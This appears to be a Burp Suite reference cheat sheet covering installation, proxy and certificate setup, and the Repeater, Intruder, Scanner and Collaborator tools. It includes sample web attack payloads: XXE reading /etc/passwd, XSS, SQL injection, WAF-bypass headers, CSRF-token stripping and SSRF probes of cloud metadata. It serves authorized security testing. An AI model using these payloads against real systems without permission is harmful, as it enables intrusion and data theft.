# Linux (apt)
sudo apt-get install burpsuite-community
# Linux (manual download)
wget https://portswigger.net/burp/releases/download
chmod +x burpsuite_community_linux_v2024.x_installer_x64.sh
./burpsuite_community_linux_v2024.x_installer_x64.sh
# macOS (Homebrew)
brew install burp-suite-community
# Windows
# Download from portswigger.net and run installer
- Purchase from Burp website
- Install via same methods as Community
- Activate with license key (can also use 30-day free trial)
| Component | Requirement |
|---|
| Java | JRE 11+ |
| RAM | 4GB minimum (8GB+ recommended) |
| Disk | 2GB free space |
| OS | Linux, macOS, Windows |
- Settings → Network → Proxy settings
- Manual proxy configuration
- HTTP Proxy:
127.0.0.1 Port: 8080
- Use this proxy for all protocols
# Via command line
google-chrome --proxy-server="http://127.0.0.1:8080"
# Or configure system proxy settings
# Settings → Advanced → System → Open proxy settings
- Proxy tab → Proxy settings
- Click “Add” under Proxy listeners
- Bind to address:
127.0.0.1 Port: 8080
- Check “Running”
- Proxy → Options → Import CA certificate
- Download
cacert.der
- Firefox → Preferences → Privacy & Security → Certificates → Import
- Select the downloaded certificate
# Linux
sudo cp burp_cacert.der /usr/local/share/ca-certificates/
sudo update-ca-certificates
# macOS
sudo security add-trusted-cert -d -r trustRoot \
-k /Library/Keychains/System.keychain burp_cacert.der
# Windows
# Double-click certificate → Install Certificate → Trusted Root
- Open Proxy → Intercept
- Check “Intercept is on”
- Browse normally in configured browser
- Requests appear in Intercept tab
- Edit and click “Forward” or “Drop”
| Feature | Purpose |
|---|
| Intercept filters | Show/hide specific request types |
| Logger | View all proxy traffic history |
| History | Browse captured requests |
| Scope | Limit to target domains only |
Ctrl+I Toggle intercept on/off
Ctrl+F Forward selected request
Ctrl+D Drop selected request
Ctrl+U URL encode selected text
- Select request in Proxy History
- Right-click → Send to Repeater
- Edit request in left panel
- Click “Send” (or Ctrl+Enter)
- View response in right panel
| Test | Method |
|---|
| Parameter manipulation | Edit parameter values |
| Authentication bypass | Remove/modify auth headers |
| SQLi detection | Inject quotes, SQL keywords |
| Header injection | Add/modify headers |
| Method override | Change GET to POST |
# Test for information disclosure
X-Original-URL: /admin
X-Rewrite-URL: /admin
# Bypass WAF
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
# Test for XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
| Type | Use Case | Payload |
|---|
| Sniper | Single parameter fuzzing | One payload position |
| Battering Ram | Multiple identical payloads | Same payload all positions |
| Pitchfork | Multiple different payloads | One payload per position (paired) |
| Cluster Bomb | Cartesian product | All combinations |
- Repeater → Select request → Send to Intruder
- Positions tab → Clear all → Mark parameters
- Payloads tab → Select attack type
- Add payload set (numbers, strings, custom)
- Options tab → Set threading (Community: 1 thread)
- Start attack
- Simple list (wordlist file)
- Numbers (range, step)
- Brute force (charset, length)
- Runtime file (external file path)
- Recursive grep (extract from responses)
- Character substitution
# Allow concurrent requests in Community edition via JVM settings
BURP_JAVA_MEMORY="-Xmx8g"
- Right-click request → Send to Scanner
- Scanner tab → Active scanning
- Configure scan scope (select categories)
- Click “Scan”
| Setting | Option |
|---|
| Crawl | Include parent directories |
| Audit | Select vulnerability types |
| Consolidate | Group duplicate issues |
| Throttle | Control request rate |
- Cross-site scripting (XSS)
- SQL injection (SQLi)
- Insecure authentication
- Cross-site request forgery (CSRF)
- Broken access control
- External entity (XXE) injection
- Insecure deserialization
- Server-side template injection (SSTI)
- Scanner tab → Issues
- Click issue → details, request/response, remediation
- Filter by severity (High, Medium, Low, Info)
- Export report (HTML, XML)
- Copy session token from request
- Sequencer tab → “Live capture”
- Paste token in token location field
- Click “Start” to capture samples
- Analyze randomness (entropy analysis)
| Entropy | Quality |
|---|
| 7+ bits/byte | Good randomness |
| 5-7 bits/byte | Moderate randomness |
| <5 bits/byte | Poor randomness (vulnerable) |
Base64
HTML
URL
Unicode
Hex
ASCII
Binary
Gzip
Base32
- Decoder tab → Paste encoded value
- Select decoder type
- View decoded output
- Switch encoders by clicking format buttons
# Encoded payload
%27%20OR%20%271%27%3D%271
# After URL decode
' OR '1'='1
# Detect as SQL injection
- Select two requests
- Right-click → Send to Comparer (x2)
- Comparer tab → Compare
- View byte-by-byte or word-by-word diff
| Scenario | Purpose |
|---|
| Before/after WAF bypass | Identify filtering changes |
| Admin vs user responses | Find authorization issues |
| Cached vs fresh response | Detect information disclosure |
- Extender tab → BApp Store
- Browse extensions (1000+ available)
- Click “Install”
| Extension | Purpose |
|---|
| Param Miner | Discover hidden parameters |
| Turbo Intruder | Faster multi-threaded attacks |
| ActiveScan++ | Enhanced vulnerability scanning |
| Collaborator Everywhere | SSRF/OOB detection |
| HTTP Request Smuggler | HTTP desync attacks |
// Simple Burp extension example
public String extensionName() {
return "My Custom Extension";
}
public void registerExtensionCallbacks(IBurpExtenderCallbacks callbacks) {
// Register callbacks
}
- Target tab → Scope → Add
- Enter domain:
example.com
- Configure protocol, port
- Exclude patterns if needed
- Proxy → Options → Intercept Client Requests
- Add filter: Show only scope items
- Check “Restrict to scope”
- Reduces noise in logs
- Focuses Scanner on target
- Prevents accidental attacks on other sites
- Proxy → Options → Match and Replace
- Click “Add”
- Set match condition (regex supported)
- Set replacement value
- Check enabled
| Match | Replace | Purpose |
|---|
User-Agent:.* | User-Agent: Mozilla/5.0 | Standardize user agent |
Authorization:.* | Authorization: Bearer TOKEN | Inject token |
CSRF-Token:.* | CSRF-Token: | Bypass CSRF check |
- Repeater → “Record macro”
- Perform login steps manually
- Stop recording
- Burp extracts session token automatically
- Proxy → Options → Session handling rules
- Scope → “Run macro before each request”
- Select recorded macro
- Intruder attacks use fresh session
- Proxy → Options → Cookie jar
- Add domain cookies manually
- Check “Enabled” for auto-handling
- Session handling rules → Add
- Set rule type (cookie, header, macro)
- Configure scope
- Enable automatic handling
- Burp Collaborator menu → Generate payload
- Inject payload into parameter:
https://collaborator.burpusercontent.com/...
- Poll → Check for interactions
- View DNS/HTTP requests from target
| Vulnerability | Method |
|---|
| Blind SQLi | 1' AND SLEEP(5)-- with timing |
| XXE | External entity with Collaborator URL |
| SSRF | Collaborator URL in URL parameter |
| Command injection | Ping collaborator domain |
<!-- Reflected XSS -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<!-- Stored XSS -->
<!-- Submit via form, verify appears in other requests -->
<!-- DOM-based XSS -->
<!-- Check browser console for errors after payload -->
-- Union-based
' UNION SELECT NULL, NULL, NULL--
-- Boolean-based
' AND 1=1--
' AND 1=2--
-- Time-based
'; WAITFOR DELAY '00:00:05'--
'; SELECT SLEEP(5)--
- Repeater → Request → Remove Session/Auth headers
- Create HTML form with target action
- View rendered form in browser
- Check if action succeeds without auth
# Probe internal services
http://localhost:8080
http://127.0.0.1:3000
http://169.254.169.254/latest/meta-data/
# Via Intruder with port numbers
http://localhost:[PORT]
# Community edition doesn't support headless mode
# Pro edition with credentials:
java -jar burpsuite_pro_v2024.x.jar \
--project-file=/path/to/project.burp \
--user-config-file=/path/to/config.json
# Via Jenkins/CI pipeline
burpsuite_pro_v2024.x --project-file=project.burp \
--scan="https://example.com"
- Dashboard → Create new project
- Name:
Target Name
- Save location (local .burp file)
- File → Save project
- File → Open project
- All proxy history, Scanner results preserved
- Target → Site map → Export
- Scanner → Issues → Export
- Format: HTML, XML, JSON
| Format | Use |
|---|
| HTML | Client reports, stakeholders |
| XML | Automated processing, CI/CD |
| JSON | API integration |
# Limit proxy history
Proxy → Options → Set history size limit
# Disable Scanner auto-crawl
Scanner → Options → Don't crawl dynamic requests
# Use scope filtering
Target → Scope → Restrict to scope only
- Community: Single-threaded only
- Pro: Increase resource pool threads
- Focus on High/Medium severity only
- Use active scanning on known endpoints
# Split into multiple projects by subdomain
# Use match/replace to inject tokens
# Save intermediate .burp files periodically
| Shortcut | Action |
|---|
| Ctrl+I | Toggle intercept |
| Ctrl+F | Forward request |
| Ctrl+D | Drop request |
| Ctrl+U | URL encode |
| Ctrl+T | Tab to next tool |
| Ctrl+R | Send to Repeater |
| Ctrl+S | Save project |
| Ctrl+K | Search in history |
| Feature | Community | Pro |
|---|
| Proxy | ✓ | ✓ |
| Repeater | ✓ | ✓ |
| Decoder | ✓ | ✓ |
| Scanner | Manual only | Automated |
| Intruder | Single-threaded | Multi-threaded |
| Sequencer | ✓ | ✓ |
| Comparer | ✓ | ✓ |
| Extender | Limited | Full |
| Collaborator | ✗ | ✓ |
| Macros | ✗ | ✓ |
| Session handling | ✗ | ✓ |
| Headless scanning | ✗ | ✓ |
- Official docs: portswigger.net/burp/documentation
- Academy: portswigger.net/web-security (free labs)
- Community: forum.portswigger.net
- Extensions: portswigger.net/bapps
